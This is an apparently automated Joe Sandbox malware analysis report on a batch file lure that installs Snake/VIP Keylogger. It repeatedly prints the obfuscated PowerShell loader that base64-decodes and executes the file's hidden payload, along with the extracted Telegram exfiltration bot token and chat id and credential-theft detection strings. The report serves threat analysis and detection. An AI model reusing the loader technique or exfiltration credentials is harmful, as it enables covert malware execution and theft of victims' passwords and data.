Edit tour

Windows Analysis Report
SOA Since OCT DEC 241738316681530012900.bat

Overview

General Information

Sample name:	SOA Since OCT DEC 241738316681530012900.bat
Analysis ID:	1637169
MD5:	091339b9b937b6193b28a92975e7d2ae
SHA1:	a4f023b841cdf5942908c93d27f33a4fbb0ffb07
SHA256:	85a8c769dc1066bc515c68796178c74677e8bfc7a6251688f9f3bccb275df2d0
Tags:	176-65-144-116batuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Powershell Decrypt And Execute Base64 Data

Suricata IDS alerts for network traffic

Yara detected Powershell decode and execute

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains process injector

.NET source code contains very large strings

.NET source code references suspicious native API functions

Creates a thread in another existing process (thread injection)

Joe Sandbox ML detected suspicious sample

PowerShell case anomaly found

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious PowerShell IEX Execution Patterns

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Inline Execution From A File

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6680 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3820 cmdline: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3888 cmdline: "C:\Windows\system32\taskkill.exe" /IM ping.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5988 cmdline: "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 3612 cmdline: C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t MD5: B3624DD758CCECF93A1226CEF252CA12)

csc.exe (PID: 2680 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

svchost.exe (PID: 4040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat id": "2135869667"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat_id": "2135869667", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x2cc8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x625e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8a2:$a1: get_encryptedPassword 0x2dbbf:$a2: get_encryptedUsername 0x2d6b2:$a3: get_timePasswordChanged 0x2d7bb:$a4: get_passwordField 0x2d8b8:$a5: set_encryptedPassword 0x2ef16:$a7: get_logins 0x2ee79:$a10: KeyLoggerEventArgs 0x2eade:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b60f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3acb2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af0f:$a4: \Orbitum\User Data\Default\Login Data 0x3b8ee:$a5: \Kometa\User Data\Default\Login Data
00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e479:$s1: UnHook 0x2e480:$s2: SetHook 0x2e488:$s3: CallNextHook 0x2e495:$s4: _hook
00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.3330969381.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.3328916486.0000000004451000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.991277571.000001BEBEC8C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x84048:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x875de:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: PING.EXE PID: 3612	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PING.EXE PID: 3612	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PING.EXE PID: 3612	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PING.EXE PID: 3612	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24b42:$a1: get_encryptedPassword 0x24e55:$a2: get_encryptedUsername 0x2495c:$a3: get_timePasswordChanged 0x24a65:$a4: get_passwordField 0x24b58:$a5: set_encryptedPassword 0x27006:$a7: get_logins 0x71bad:$a7: get_logins 0x26f69:$a10: KeyLoggerEventArgs 0x71b10:$a10: KeyLoggerEventArgs 0x26bd2:$a11: KeyLoggerEventArgsEventHandler
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.PING.EXE.6900000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PING.EXE.6900000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.PING.EXE.6900000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PING.EXE.6900000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8a2:$a1: get_encryptedPassword 0x2dbbf:$a2: get_encryptedUsername 0x2d6b2:$a3: get_timePasswordChanged 0x2d7bb:$a4: get_passwordField 0x2d8b8:$a5: set_encryptedPassword 0x2ef16:$a7: get_logins 0x2ee79:$a10: KeyLoggerEventArgs 0x2eade:$a11: KeyLoggerEventArgsEventHandler
8.2.PING.EXE.6900000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b60f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3acb2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af0f:$a4: \Orbitum\User Data\Default\Login Data 0x3b8ee:$a5: \Kometa\User Data\Default\Login Data
8.2.PING.EXE.6900000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e479:$s1: UnHook 0x2e480:$s2: SetHook 0x2e488:$s3: CallNextHook 0x2e495:$s4: _hook
8.2.PING.EXE.6900000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PING.EXE.6900000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
8.2.PING.EXE.6900000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PING.EXE.6900000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2baa2:$a1: get_encryptedPassword 0x2bdbf:$a2: get_encryptedUsername 0x2b8b2:$a3: get_timePasswordChanged 0x2b9bb:$a4: get_passwordField 0x2bab8:$a5: set_encryptedPassword 0x2d116:$a7: get_logins 0x2d079:$a10: KeyLoggerEventArgs 0x2ccde:$a11: KeyLoggerEventArgsEventHandler
8.2.PING.EXE.6900000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3980f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38eb2:$a3: \Google\Chrome\User Data\Default\Login Data 0x3910f:$a4: \Orbitum\User Data\Default\Login Data 0x39aee:$a5: \Kometa\User Data\Default\Login Data
8.2.PING.EXE.6900000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c679:$s1: UnHook 0x2c680:$s2: SetHook 0x2c688:$s3: CallNextHook 0x2c695:$s4: _hook
Click to see the 7 entries

Other

Source	Rule	Description	Author	Strings
amsi64_3820.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious PowerShell IEX Execution Patterns

Source: Process started

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", ProcessId: 2680, ProcessName: csc.exe

Sigma detected: Powershell Inline Execution From A File

Source: Process started

Author: frack113: Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4040, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Powershell Decrypt And Execute Base64 Data

Source: Process started

Author: Joe Security: Data: Command: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", CommandLine|base64offset|contains: E!, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6680, ParentProcessName: cmd.exe, ProcessCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ProcessId: 3820, ProcessName: powershell.exe

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline", ProcessId: 2680, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:42:31.054362+0100	2803305	3	Unknown Traffic	192.168.2.8	49685	104.21.32.1	443	TCP
2025-03-13T11:42:35.338531+0100	2803305	3	Unknown Traffic	192.168.2.8	49691	104.21.32.1	443	TCP
2025-03-13T11:42:44.573491+0100	2803305	3	Unknown Traffic	192.168.2.8	58063	104.21.32.1	443	TCP
2025-03-13T11:42:47.641724+0100	2803305	3	Unknown Traffic	192.168.2.8	58067	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:42:24.594100+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	132.226.8.169	80	TCP
2025-03-13T11:42:29.031647+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49682	132.226.8.169	80	TCP
2025-03-13T11:42:33.281665+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49688	132.226.8.169	80	TCP
2025-03-13T11:42:36.516020+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	58058	132.226.8.169	80	TCP
2025-03-13T11:42:39.500531+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	58060	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:42:56.981507+0100	1810007	1	Potentially Bad Traffic	192.168.2.8	58075	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SOA Since OCT DEC 241738316681530012900.bat

Avira: detected

Found malware configuration

Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "8043603189:AAFpR2ormgQgQpP5aDirNgZd72aHXUsGdlI", "Chat id": "2135869667"}
